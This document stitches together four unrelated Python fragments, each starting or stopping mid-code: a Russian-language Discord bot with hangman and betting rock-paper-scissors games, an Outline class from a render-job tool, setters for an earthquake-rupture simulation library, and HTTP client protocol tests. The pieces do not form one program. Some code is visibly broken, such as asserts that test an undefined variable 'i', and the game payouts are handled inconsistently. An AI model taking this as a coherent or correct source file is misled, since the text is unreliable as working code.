'капибара',
'игрунка',
'бегемот',
'кашалот',
'коала',
'козел',
'корова',
'свинья',
'косуля',
'крыса',
'лев',
'леопард',
'гепард',
'летяга',
'лось',
'лошадь',
'конь',
'морж',
'овца',
'ондатра',
'песчанка',
'пони',
'рысь',
'лисица',
'лиса',
'антилопа',
'сайгак',
'соня',
'ленивец',
'шимпанзе',
'ягуар',
'як',
'шиншилла',
'акула',
'чайка',
'скумбрия',
'змееящерица',
'ястреб',
'варан',
'журавль',
'лев',
'тигр',
'бабочка',
'геккон',
'барсук',
'щука',
'гепард',
'волк',
'буйвол',
'бурундук',
'снегирь',
'крыса',
'альбатрос',
'черепаха',
'акула',
'жаба',
'лягушка',
'пищуха',
'кряква',
'утка',
'утконос',
'пиранья',
'пиранга',
'аист',
'уж',
'сом',
'осетр',
'соня',
'жираф',
'дрозд',
'лемминг',
'пенелопа',
'свиристель',
'свистун',
'клещ',
'медведь',
'осел',
'газель',
'хамелеон',
'дикобраз',
'ястреб',
'голубь',
'воробей',
'ворона',
'сорока',
'рысь',
'пума',
'бабуин',
'стриж',
'тюлень',
'опоссум',
'орлан',
'попугай',
'певун',
'баклан',
'удод',
'тля',
'моль',
'выдра',
'колибри',
'гну',
'бизон',
'древолаз',
'шелкопряд',
'блоха',
'вошь',
'свинья',
'кабан',
'свин',
'хомяк',
'лань',
'кролик',
'антилопа',
'леопард',
'какаду',
'конь',
'муравьед',
'вилорог',
'сельдь',
'ослик',
'ночница',
'саламандра',
'филин',
'сова',
'гадюка',
'морж',
'дятел',
'петух',
'курица',
'осьминог',
'краб',
'креветка',
'лягушка',
'бабочка',
'глухарь',
'гусь',
'кенгуру',
'аноа',
'тритон',
'карась',
'аист',
'бык',
'дзерен',
'синица',
'удав',
'бегемот',
'суслик',
'шпрот',
'енот',
'трясогузка',
'медосос',
'окунь',
'нетопырь',
'цапля',
'кукушка',
'рогоклюв',
'фазан',
'сипуха',
'зубр',
'кит',
'игуана']
guesses = 0
word = random.choice(word_list)
word_list = list(word)
blanks = ("◆" * len(word))
blanks_list = list(blanks)
unbox_blank = (' '.join(blanks_list))
new_blanks_list = list(blanks)
guess_list = []
guess_list_unbox = (', '.join(guess_list))
embed_formatter = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_formatter.set_author(name='Виселица')
hangman_picture_1 = """```
_______
|/ |
|
|
|
|
|
_|___```"""
hangman_picture_5 = """```
_______
|/ |
| (_)
| \|/
| |
|
|
_|___```"""
hangman_picture_4 = """```
_______
|/ |
| (_)
| \|/
|
|
|
_|___```"""
hangman_picture_3 = """```
_______
|/ |
| (_)
| \|
|
|
|
_|___```"""
hangman_picture_2 = """```
_______
|/ |
| (_)
|
|
|
|
_|___```"""
hangman_picture_6 = """```
_______
|/ |
| (_)
| \|/
| |
| /
|
_|___```"""
hangman_picture_7 = """```
_______
|/ |
| (_)
| \|/
| |
| / \\
|
_|___```"""
image = 'шо'
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация', value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
while guesses < 7:
embed_formatter.clear_fields()
if guesses == 0:
image = hangman_picture_1
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация', value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
if guesses == 1:
image = hangman_picture_2
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация', value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
if guesses == 2:
image = hangman_picture_3
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация', value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
if guesses == 3:
image = hangman_picture_4
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация', value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
if guesses == 4:
image = hangman_picture_5
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация', value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
if guesses == 5:
image = hangman_picture_6
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация', value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
if guesses == 6:
image = hangman_picture_7
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация', value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
await ctx.send(embed=embed_formatter)
russian_symbols = {'а', 'б', 'в', 'г', 'д', 'е', 'ё', 'ж', 'з', 'и', 'й', 'к', 'л', 'м', 'н', 'о', 'п', 'р',
'с', 'т', 'у', 'ф', 'х', 'ц', 'ч', 'ш', 'щ', 'ъ', 'ь', 'ы', 'э', 'ю', 'я'}
def check(author):
def inner_check(message):
return message.author == author and message.content.casefold() in russian_symbols
return inner_check
guess = await self.client.wait_for('message', check=check(ctx.author), timeout=120)
if len(guess.content) > 1 and guess.content != word:
await ctx.send('Хватит жульничать')
guesses -= 1
if guess.content == " ":
await ctx.send("Эй, ты не хочешь играть чтоле? Давай пиши подходящие буквы!")
if guess.content in guess_list:
await ctx.send(f"Ты уже использовал данный символ!")
else:
if len(guess.content) == 1:
guess.content = guess.content.casefold()
guess_list.append(guess.content)
guess_list_unbox = (', '.join(guess_list))
i = 0
while i < len(word):
if guess.content == word[i]:
new_blanks_list[i] = word_list[i]
i = i + 1
if new_blanks_list == blanks_list:
guesses = guesses + 1
if word_list != blanks_list:
blanks_list = new_blanks_list[:]
unbox_blank = (' '.join(blanks_list))
if word_list == blanks_list or guess.content.casefold() == word:
emoji = self.client.get_emoji(676803534758477845)
embed_formatter.clear_fields()
embed_formatter.add_field(name='Животные', value=image)
embed_formatter.add_field(name='Информация',
value=f'\n Попыток: {guesses} \n ```{unbox_blank}```')
embed_formatter.set_footer(text=str(guess_list_unbox))
await ctx.send(embed=embed_formatter)
await self.client.update_currency(member_id, 1000)
await ctx.send(f'За победу в игре "Виселица" вы получаете + **1000** {emoji} на ваш счёт!')
break
if guesses == 7:
await ctx.send(f'Вы проиграли! Правильное слово: {word}')
@commands.command(pass_context=True, aliases=['rockpaperscissors', 'rps', 'rcp', 'кнб', 'каменьножницыбумага'])
async def rock_paper_scissors(self, ctx, bet: int):
emoji = self.client.get_emoji(676803534758477845)
author = ctx.author
member_id = str(author.id)
self.client.currency[member_id]['money'] -= bet
if self.client.currency[member_id]['money'] >= 0:
emote = ['🗿', '📄', "✂"]
computer_choise = random.choice(emote)
embedscis = discord.Embed(
color=discord.Colour.dark_purple()
)
embedscis.add_field(name='Камень ножницы Бумага',
value=f'Скорее сделайте вам выбор!Тет уже выбрал. {random.choice(msgend)}')
embed_draw = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_draw.add_field(name='Камень ножницы Бумага',
value=f'Тет выбирал: {computer_choise} Ничья! Сыграем ещё раз? {random.choice(msgend)}')
embed_shiro_win = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_shiro_win.add_field(name='Камень ножницы Бумага',
value=f'Тет выбирал: {computer_choise} Тет победил! {random.choice(msgend)} ')
embed_user_win = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_user_win.add_field(name='Камень ножницы Бумага',
value=f'Тет выбирал: {computer_choise} {author.mention} победил(а). {random.choice(msgend)}')
message = await ctx.send(embed=embedscis)
for e in emote:
await message.add_reaction(e)
def check(reaction, user):
return (reaction.message.id == message.id) and (user.id == ctx.author.id) and (str(reaction) in emote)
try:
reaction, user = await self.client.wait_for('reaction_add', check=check, timeout=60)
except asyncio.TimeoutError:
await ctx.send("Время вышло")
return
if str(reaction) == '🗿' and computer_choise == '🗿':
await ctx.send(embed=embed_draw)
self.client.currency[member_id]['money'] += bet
if str(reaction) == '🗿' and computer_choise == '📄':
await ctx.send(embed=embed_shiro_win)
if str(reaction) == '🗿' and computer_choise == '✂':
await ctx.send(embed=embed_user_win)
await self.client.update_currency(member_id, bet * 2)
await ctx.send(f'Вы получаете {bet * 2} {emoji}')
if str(reaction) == '📄' and computer_choise == '🗿':
await ctx.send(embed=embed_user_win)
await self.client.update_currency(member_id, bet * 2)
await ctx.send(f'Вы получаете {bet * 2} {emoji}')
if str(reaction) == '📄' and computer_choise == '📄':
await ctx.send(embed=embed_draw)
self.client.currency[member_id]['money'] += bet
if str(reaction) == '📄' and computer_choise == '✂':
await ctx.send(embed=embed_shiro_win)
if str(reaction) == '✂' and computer_choise == '🗿':
await ctx.send(embed=embed_shiro_win)
if str(reaction) == '✂' and computer_choise == '📄':
await ctx.send(embed=embed_user_win)
self.client.currency[member_id]['money'] += bet * 2
await ctx.send(f'Вы получаете {bet * 2} {emoji}')
if str(reaction) == '✂' and computer_choise == '✂':
await ctx.send(embed=embed_draw)
await self.client.update_currency(member_id, bet)
else:
await ctx.send(f'Недостаточно {emoji} чтобы играть')
self.client.currency[member_id]['money'] += bet
@rock_paper_scissors.error
async def moneydaily_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
embed = discord.Embed(
color=discord.Colour.dark_purple()
)
embed.add_field(name='Ошибка', value='Ваша ставка это обязательная опция!\n ```.кнб 5000```')
await ctx.send(embed=embed)
@commands.command()
async def bkeytinfo(self, ctx):
information_embed = discord.Embed(
color=discord.Colour.dark_purple()
)
information_embed.add_field(name='<NAME>',
value='Игра, которая основывается на стандартных "камень ножницы бумага", '
'но однако является его аниме-стилизованной интерпретацией. Блок схема '
'"кто-кого" бьёт прикрепляется к данному сообщению '
'\n Эмодзи и их значение: \nКирпич - 🧱, Нож - 🔪,Компромат - 📋,Яндере - '
'😈 ,Тентакли - 🐙 ')
information_embed.set_image(
url='https://cdn.discordapp.com/attachments/657178465174552616/678491112712830976/ae45770720efac14.png')
await ctx.send(embed=information_embed)
@commands.command(name='bkeyt', aliases=['кнкят'])
async def bkeyt(self, ctx, bet: int):
emoji = self.client.get_emoji(676803534758477845)
author = ctx.author
member_id = str(author.id)
await self.client.unupdate_currency(member_id, bet)
if self.client.currency[member_id]['money'] >= 0:
emote = ['🧱', '🔪', "📋", '😈', '🐙']
computer_choise = random.choice(emote)
embedscis = discord.Embed(
color=discord.Colour.dark_purple()
)
embedscis.add_field(name='<NAME>',
value=f'Скорее выбирай! Тет ужe сделал свой выбор. {random.choice(msgend)}')
embed_draw = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_shiro_win = discord.Embed(
color=discord.Colour.dark_purple()
)
embed_user_win = discord.Embed(
color=discord.Colour.dark_purple()
)
message = await ctx.send(embed=embedscis)
for e in emote:
await message.add_reaction(e)
def check(reaction, user):
return (reaction.message.id == message.id) and (user.id == ctx.author.id) and (str(reaction) in emote)
try:
reaction, user = await self.client.wait_for('reaction_add', check=check, timeout=60)
except asyncio.TimeoutError:
await ctx.send("Время закончилось")
return
# 1 - 5
if str(reaction) == '🧱' and computer_choise == '🧱':
embed_draw.add_field(name='<NAME>',
value='Кирпич на кирпич! Вау, строим дом. Ничья!')
await ctx.send(embed=embed_draw)
self.client.currency[member_id]['money'] += bet
if str(reaction) == '🧱' and computer_choise == '🔪':
embed_user_win.add_field(name='<NAME>',
value=f'Кирпич и нож. Эй, ножик может ты хотя бы попробуешь? Нет? Тогда {author.mention} побеждает!')
await ctx.send(embed=embed_user_win)
await self.client.update_currency(member_id, bet * 2)
await ctx.send(f'Вы получаете {bet * 2} {emoji}')
if str(reaction) == '🧱' and computer_choise == '📋':
embed_shiro_win.add_field(name='<NAME>',
value="Кирпич и компромат. Прямо | |
outline file is yamlized before being
# copied into the outline session. If not, the script
# is copied as is. Default is True.
self.__serialize = serialize
#
# The path to a native outline script. If a path
# is specified in the constructor, then it must
# be a path to a native (not serialized) outline
# script.
#
self.__path = None
if path:
self.__path = path
# If the name was not previously set, use the name
# of the outline file. This allows the user to override
# the auto-naming based on the outline file name if needed.
if not self.__name:
self.__name = self.__get_name_by_path()
# Now parse the outline script.
self.parse_outline_script(path)
else:
# If the user does not pass in a name or a path to an
# outline, give the outline a default name.
if not self.__name:
self.__name = "outline"
if name_unique:
self.__name = "%s_%s" % (self.__name, str(uuid.uuid4())[0:7])
def __get_name_by_path(self):
"""Return the name of the session based on the outline."""
return os.path.splitext(os.path.basename(self.__path))[0]
def parse_outline_script(self, path):
"""
Parse an outline script and add the resulting layers
to this instance.
"""
Outline.current = self
parse_outline_script(path)
def load_session(self):
"""
Reloads the session
"""
if outline.session.is_session_path(self.get_path()):
self.__session = outline.session.Session(self)
else:
msg = "failed to load outline %s, not part of a session."
raise outline.exception.OutlineException(msg % self.get_path())
def setup(self):
"""
Sets up the outline to run frames.
A new session is created for the outline and setup()
methods are run for each layer.
- Creates a new session
- Checks require arguments on all layers.
- Runs tge setup() method for all layers.
- Serializes outline structure into the session.
- Sets the outline state to READY.
"""
if self.__mode >= outline.constants.OUTLINE_MODE_SETUP:
raise outline.exception.OutlineException("This outline is already setup.")
self.setup_depends()
self.__mode = outline.constants.OUTLINE_MODE_SETUP
self.__session = outline.session.Session(self)
# Run setup() for every layer assuming the frame range
# can be determined. If there is no frame range, the layer
# is not going to be launched to the cue.
for layer in self.__layers:
if layer.get_frame_range():
layer.setup()
# Remove self from the current outline.
if Outline.current == self:
Outline.current = None
if self.__serialize:
yaml_file = os.path.join(self.__session.get_path(),
"outline.yaml")
# Set a new path before serialzing the outline file.
logger.info("setting new outline path: %s", yaml_file)
self.set_path(yaml_file)
# Copy the session over to a local variable and unset
# self.__session. We do not want the session to be
# archived with the outline because relaunching the
# job using the serialized outline will fail.
session = self.__session
self.__session = None
# Now copy outline file in.
logger.info("serializing outline script to session path.")
session.put_data(os.path.basename(yaml_file), self)
# Switch the session back in.
self.__session = session
elif not self.__serialize and self.get_path():
logger.info("copying outline script to session path.")
self.__session.put_file(self.get_path(), None, "script.outline")
else:
raise outline.exception.OutlineException(
"Failed to serialize outline, Procedural outlines must always use serialization.")
# Set our new mode and save.
self.set_mode(outline.constants.OUTLINE_MODE_READY)
self.__session.save()
def setup_depends(self):
"""
Iterate through layers and setup any dependencies passed in
via the "require" argument.
"""
logger.info("Setting up dependencies")
for layer in self.get_layers():
# Setup dependencies passed in via the layer's require argument.
if layer.get_arg("require", False):
if not isinstance(layer.get_arg("require"), (tuple, list, set)):
require, dtype = outline.depend.parse_require_str(layer.get_arg("require"))
try:
layer.depend_on(self.get_layer(require), dtype)
except outline.exception.OutlineException:
logger.warning("Invalid layer in depend %s, skipping", require)
continue
else:
# Process the require argument.
for require in layer.get_arg("require"):
require, dtype = outline.depend.parse_require_str(require)
try:
layer.depend_on(self.get_layer(str(require)), dtype)
except outline.exception.OutlineException:
logger.warning("Invalid layer in depend %s, skipping", require)
continue
def add_layer(self, layer):
"""Adds a new layer."""
if not layer.get_arg("register"):
return
if layer in self.__layers:
logger.info("The layer %s was already added to this outline.", layer.get_name())
return
if self.is_layer(layer.get_name()):
raise outline.exception.OutlineException(
"The layer %s already exists" % layer.get_name())
self.__layers.append(layer)
layer.set_outline(self)
layer.after_init(self)
try:
if getattr(layer, "get_children"):
for child in layer.get_children():
child.set_outline(self)
child.after_init(self)
except AttributeError:
pass
# If we're in setup mode, run setup ASAP
if self.__mode == outline.constants.OUTLINE_MODE_SETUP:
layer.setup()
logger.info("adding layer: %s", layer.get_name())
def remove_layer(self, layer):
"""Remove an existing layer."""
if self.__mode >= outline.constants.OUTLINE_MODE_SETUP:
msg = "Cannot remove layers to an outline not in init mode."
raise outline.exception.OutlineException(msg)
if layer in self.__layers:
self.__layers.remove(layer)
def get_layer(self, name):
"""Return an later by name."""
layer_map = {evt.get_name(): evt for evt in self.__layers}
try:
return layer_map[name]
except Exception as e:
raise outline.exception.OutlineException("invalid layer name: %s, %s" % (name, e))
def get_layers(self):
"""Return the outline's layers
Modifying the result of this method will not alter the actual
layer list. To add a new layer, use register_layer.
"""
return list(self.__layers)
def is_layer(self, name):
"""Return true if a layer exists with the specified name."""
layer_map = {evt.get_name(): evt for evt in self.__layers}
return name in layer_map
def get_path(self):
"""Return the path to the outline file."""
return self.__path
def set_path(self, path):
"""Return the path to the outline file."""
self.__path = path
def set_name(self, name):
"""Set the name of this outline.
The name is usually based on the name of the outline
script but its possible to set it manually. Do not
include the show-shot-user prefix when setting the
name.
Once the outline is setup to launch, changing
the name has no effect.
"""
self.__name = name
def get_name(self):
"""Return the name of the outline."""
return self.__name
def get_full_name(self):
"""
Return the full name of the Outline instance, which
includes the show, shot, user, and file name.
"""
if self.__session:
return self.get_session().get_name().split("/")[0]
return "%s-%s-%s_%s" % (self.get_show(),
self.get_shot(),
self.get_user(),
self.get_name())
def get_shot(self):
"""Return the shot for this outline."""
if self.__shot is None:
return outline.util.get_shot()
return self.__shot
def set_shot(self, shot):
"""Set the shot name for this outline instance.
:type shot: string
:param shot: The name of shot to set.
"""
self.__shot = shot
def get_show(self):
"""Return the show for this outline."""
if self.__show is None:
return outline.util.get_show()
return self.__show
def set_show(self, show):
"""Set the show name for this outline instance.
:type show: string
:param show: The name of show to set.
"""
self.__show = show
def get_user(self):
"""Return the user for this outline."""
if self.__user is None:
return outline.util.get_user()
return self.__user
def set_user(self, user):
"""Set the user name for this outline instance.
:type user: string
:param user: The name of user to set.
"""
self.__user = user
def get_facility(self):
"""Return the launch facility for this outline."""
return self.__facility
def set_facility(self, facility):
"""Set the launch facility for this outline instance.
:type facility: string
:param facility: The name of the facility to set.
"""
self.__facility = facility
def get_maxcores(self):
"""Return the maximum number of CPU cores fot this outline."""
return self.__maxcores
def set_maxcores(self, maxcores):
"""Set the maximum number of CPU cores for this outline instance.
:type maxcores: int
:param maxcores: The maximum number of CPU cores to set.
"""
self.__maxcores = maxcores
def get_maxgpus(self):
"""Return the maximum number of GPU units fot this outline."""
return self.__maxgpus
def set_maxgpus(self, maxgpus):
"""Set the maximum number of GPU units for this outline instance.
:type maxcores: int
:param maxcores: The maximum number of GPU units to set.
"""
self.__maxgpus = maxgpus
def get_mode(self):
"""Return the current mode of this outline object.
See outline.constants for a list of possible modes. The mode
cannot be set from outside of the module.
"""
return self.__mode
def set_mode(self, mode):
"""Set the current mode of the outline."""
if mode < self.__mode:
raise outline.exception.OutlineException("You cannot go back to previous modes.")
self.__mode = mode
def get_session(self):
"""
Return the session object. An OutlineException is raised if the
session has not been setup.
:rtype: outline.session.Session
:return: The outline's session object.
"""
if not self.__session:
raise outline.exception.SessionException("A session has not been created yet.")
return self.__session
def set_frame_range(self, frame_range):
"""Set the outline's frame set. The frame set must be
assigned before the outline can go into the setup phase.
:type frame_range: str or list or set or tuple or FileSequence.FrameSet
:param frame_range: The frame range for this outline.
"""
if isinstance(frame_range, FileSequence.FrameSet):
self.__frame_range = str(frame_range)
elif isinstance(frame_range, (list, set, tuple)):
self.__frame_range = ",".join([str(frame) for
frame in frame_range])
else:
self.__frame_range | |
properties array (numpy array with shape ``(3, nx, ny, nz)``)
:type mat: ndarray
:returns: None
"""
if self.ndim == 3:
assert (mat.shape[1:] == self.nx), "heterogeneous material properties shape must match grid sizes"
else:
assert (mat.shape[1:] == self.nx[0:2]), "heterogeneous material properties shape must match grid sizes"
self.f.set_het_material(mat)
def get_plastic_tensor(self):
"""
Returns boolean indicating if simulation will compute full plastic strain tensor
:returns: Whether or not simulation will compute the full plastic strain tensur
:rtype: bool
"""
return self.f.get_plastic_tensor()
def set_plastic_tensor(self, plastic_tensor):
"""
Sets value of plastic strain tensor indicator
Method sets whether or not plastic strain will be computed as a tensor (must be boolean).
``True`` means full tensor will be calculated, ``False`` means not (not saves substantial memory)
:param plastic_tensor: New value of plastic strain tensor variable (must be boolean)
:type plastic_tensor: bool
:returns: None
"""
self.f.set_plastic_tensor(plastic_tensor)
def get_nifaces(self):
"""
Returns number of interfaces
:returns: Number of interfaces
:rtype: int
"""
return self.nifaces
def get_iftype(self, index = None):
"""
Returns interface type of given index, if none provided returns full list
:param index: (optional) index of desired interface (zero-indexed). If not given or if ``None``
is given the entire list of interface types is returned
:type index: int
:returns: str or list
"""
if index is None:
return self.iftype
else:
assert index >= 0 and index < self.nifaces, "Index out of range"
return self.iftype[index]
def set_iftype(self, index, iftype):
"""
Sets type of interface with a given index
Changes type of a particular interface. ``index`` is the index of the interface to be
modified and ``iftype`` is a string denoting the interface type. Valid values for
``iftype`` are ``'locked'``, ``'frictionless'``, ``'slipweak'``, and ``'stz'``. Any other values
will result in an error, as will an interface index that is out of bounds.
:param index: Index (nonnegative integer) of interface to be modified
:type index: int
:param iftype: New interface type (see valid values above)
:type iftype: str
:returns: None
"""
assert index >=0 and index < self.nifaces, "Index not in range"
assert (iftype == "locked" or iftype == "frictionless" or iftype == "slipweak" or iftype == "stz")
if iftype == self.interfaces[index].get_type():
return
self.iftype[index] = iftype
direction = self.interfaces[index].get_direction()
bm = self.interfaces[index].get_bm()
bp = self.interfaces[index].get_bp()
if iftype == "locked":
self.interfaces[index] = interface(self.ndim, index, direction, bm, bp)
elif iftype == "frictionless":
self.interfaces[index] = friction(self.ndim, index, direction, bm, bp)
elif iftype == "slipweak":
self.interfaces[index] = slipweak(self.ndim, index,direction,bm,bp)
else:
self.interfaces[index] = stz(self.ndim, index,direction,bm,bp)
def get_nloads(self, index):
"""
Returns number of loads on interface with given index
:param index: index of desire interface (zero-indexed)
:type niface: int
:returns: int
"""
assert i is int and i >= 0 and i < self.nifaces, "Must give integer index for interface"
return self.interfaces[index].get_nloads()
def add_load(self, newload, index = None):
"""
Adds load to interface
Add a load perturbation to the interface with the given index. If no index is provided,
the load will be added to all interfaces. If the index is an integer, the load will be added
to the interface with that index. Finally, the index can be an interable (list or tuple) of
integers, and the load will be added to all interfaces in the iterable. Indices that are
out of bounds or indicate an interface that is not frictional will raise an error.
Default value is ``None`` (all interfaces).
``newload`` must be a load perturbation (i.e. have type ``load``), or the code will raise an
error. ``newload`` will be appended to the load list
:param newload: Load to be added
:type newload: ~fdfault.load
:param index: Interface to which the load should be added. Can be a single integer,
iterable of integers, or ``None`` to add to all interfaces (default is ``None``)
:type index: int or tuple or list or None
:returns: None
"""
if index is None:
for iface in self.interfaces:
try:
iface.add_load(newload)
except NotImplementedError:
print("skipping non-frictional interface")
else:
try:
for i in index:
assert type(i) is int and i >= 0 and i < self.nifaces, "Must give integer index for interface"
self.interfaces[i].add_load(newload)
except:
assert type(index) is int and index >= 0 and index < self.nifaces, "Must give integer index for interface"
self.interfaces[index].add_load(newload)
def delete_load(self, niface, index = -1):
"""
Deletes load from index niface at position index from the list of loads
Deletes loads from a frictional interface. ``niface`` is an index refering to the desired
interface. Out of bounds values or interfaces that are not frictional will result in an error.
``index`` indicates the position in the load list that should be deleted.
Default for ``index`` is ``-1`` (most recently added).
:param niface: Interface from which the load should be removed. ``niface`` must refer to
a frictional interface
:type niface: int
:param index: Index within the load perturbation that should be removed (default is last)
:type index: int
:returns: None
"""
assert niface is int and i >=0 and i < self.nifaces, "Must give integer index for interface"
self.interfaces[niface].delete_load(index)
def get_load(self, niface, index = None):
"""
Returns load for index niface at position index. If no index provided, returns entire list of perturbations
:param niface: index of desire interface (zero-indexed)
:type niface: int
:param index: (optional) index of perturbation. If not provided or None, then returns entire list
:type index: int
:returns: load or list
"""
assert niface is int and i >=0 and i < self.nifaces, "Must give integer index for interface"
return self.interfaces[niface].get_load(index)
def get_nperts(self, index):
"""
Returns number of perturbations (integer) on given interface with given index
:param index: index of desired interface (zero-indexed)
:type index: int
:returns: int
"""
assert i is int and i >= 0 and i < self.nifaces, "Must give integer index for interface"
return self.interfaces[index].get_nperts()
def add_pert(self, newpert, index = None):
"""
Add new friction parameter perturbation to an interface
Method adds a frictional parameter perturbation to an interface. ``newpert`` must
be a parameter perturbation of the correct kind for the given interface type (i.e. if
the interface is of type ``slipweak``, then ``newpert`` must have type ``swparam``).
``index`` indicates the index of the interface to which the perturbation will be added.
``index`` can be a single integer index, an iterable containing multiple indices, or
``None`` to add to all interfaces (default behavior is ``None``). Out of bounds values
will raise an error.
:param newpert: New perturbation to be added. Must have a type that matches
the interface(s) in question.
:type newpert: pert (more precisely, one of the derived classes of friction parameter perturbations)
:param index: Index of interface to which the perturbation will be added (single index or
iterable of indices, or ``None`` for all interfaces, optional)
:type index: int or list or tuple or None
:returns: None
"""
if index is None:
for iface in self.interfaces:
try:
iface.add_pert(newpert)
except NotImplementedError:
print("skipping non-frictional interface")
else:
try:
for i in index:
assert type(i) is int and i >= 0 and i < self.nifaces, "Must give integer index for interface"
self.interfaces[i].add_pert(newpert)
except:
assert type(index) is int and index >= 0 and index < self.nifaces, "Must give integer index for interface"
self.interfaces[index].add_pert(newpert)
def delete_pert(self, niface, index = -1):
"""
Deletes frictional parameter perturbation from interface
``niface`` is an integer indicating the index of the desired interface. If out of bounds, will
give an error.
``index`` is an integer that indicates the position within the list of loads. Default is most
recently added (-1).
:param niface: Index of interface from which to remove the parameter perturbation
:type niface: int
:param index: Index within perturbation list of the given interface to remove. Default is
last item (-1, or most recently added)
:type index: int
:returns: None
"""
assert type(niface) is int and niface >= 0 and niface < self.nifaces, "Must give integer index for interface"
self.interfaces[niface].delete_pert(index)
def get_pert(self, niface, index = None):
"""
Returns perturbation for index | |
\
HttpResponseReader.read()
"""
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
writer = await protocol.write_request(
HttpRequestMethod.POST, uri="/", headers={"content-type": "1"}
)
writer.write(os.urandom(1))
await writer.flush()
writer.finish()
protocol.data_received(
b"HTTP/1.1 200 OK\r\nTransfer-Encoding: Chunked\r\n\r\n"
)
reader = await writer.read_response()
protocol.connection_lost(None)
assert transport_mock._closing is True
with pytest.raises(ReadAbortedError):
await reader.read()
@helper.run_async_test
async def test_local_abort_1(self):
"""
HttpClientProtocol.write_request() -x-> \
[HttpRequestWriter.write(), HttpRequestWriter.flush()] -> \
HttpRequestWriter.finish() -> \
HttpRequestWriter.read_response() -> \
HttpResponseReader.read()
"""
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
writer = await protocol.write_request(HttpRequestMethod.GET, uri="/")
writer.abort()
assert transport_mock._closing is True
with pytest.raises(WriteAbortedError):
await writer.flush()
with pytest.raises(WriteAbortedError):
writer.finish()
with pytest.raises(ReadAbortedError):
await writer.read_response()
@helper.run_async_test
async def test_local_abort_2(self):
"""
HttpClientProtocol.write_request() -> \
[HttpRequestWriter.write(), HttpRequestWriter.flush()] -x-> \
HttpRequestWriter.finish() -> \
HttpRequestWriter.read_response() -> \
HttpResponseReader.read()
"""
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
writer = await protocol.write_request(
HttpRequestMethod.POST, uri="/", headers={"content-type": "1"}
)
writer.write(os.urandom(1))
await writer.flush()
writer.abort()
assert transport_mock._closing is True
with pytest.raises(WriteAbortedError):
writer.finish()
with pytest.raises(ReadAbortedError):
await writer.read_response()
@helper.run_async_test
async def test_local_abort_3(self):
"""
HttpClientProtocol.write_request() -> \
[HttpRequestWriter.write(), HttpRequestWriter.flush()] -> \
HttpRequestWriter.finish() -x-> \
HttpRequestWriter.read_response() -> \
HttpResponseReader.read()
"""
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
writer = await protocol.write_request(
HttpRequestMethod.POST, uri="/", headers={"content-type": "1"}
)
writer.write(os.urandom(1))
await writer.flush()
writer.finish()
protocol.data_received(
b"HTTP/1.1 200 OK\r\nTransfer-Encoding: Chunked\r\n\r"
)
writer.abort()
assert transport_mock._closing is True
with pytest.raises(ReadAbortedError):
await writer.read_response()
@helper.run_async_test
async def test_local_abort_4(self):
"""
HttpClientProtocol.write_request() -> \
[HttpRequestWriter.write(), HttpRequestWriter.flush()] -> \
HttpRequestWriter.finish() -> \
HttpRequestWriter.read_response() -x-> \
HttpResponseReader.read()
"""
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
writer = await protocol.write_request(
HttpRequestMethod.POST, uri="/", headers={"content-type": "1"}
)
writer.write(os.urandom(1))
await writer.flush()
writer.finish()
protocol.data_received(
b"HTTP/1.1 200 OK\r\nTransfer-Encoding: Chunked\r\n\r\n"
)
reader = await writer.read_response()
writer.abort()
assert transport_mock._closing is True
with pytest.raises(ReadAbortedError):
await reader.read()
@helper.run_async_test
async def test_endless_response_cutoff(self):
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(b"HTTP/1.0 200 OK\r\n\r\n")
writer = await protocol.write_request(HttpRequestMethod.GET, uri="/")
writer.finish()
reader = await writer.read_response()
for _ in range(0, 5):
data = os.urandom(1024)
protocol.data_received(data)
assert await reader.read(4096) == data
transport_mock._closing = True
protocol.connection_lost(OSError())
with pytest.raises(ReadAbortedError):
await reader.read()
@helper.run_async_test
async def test_http11_100continue_response(self):
protocol = HttpClientProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"HTTP/1.1 100 Continue\r\n\r\n"
b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\n12345"
)
writer = await protocol.write_request(HttpRequestMethod.GET, uri="/")
writer.finish()
reader = await writer.read_response()
assert await reader.read() == b"12345"
assert reader.initial.status_code == 200
assert reader.initial.headers == {"content-length": "5"}
assert protocol.eof_received() is True
protocol.connection_lost(None)
class HttpServerProtocolTestCase:
def test_init(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
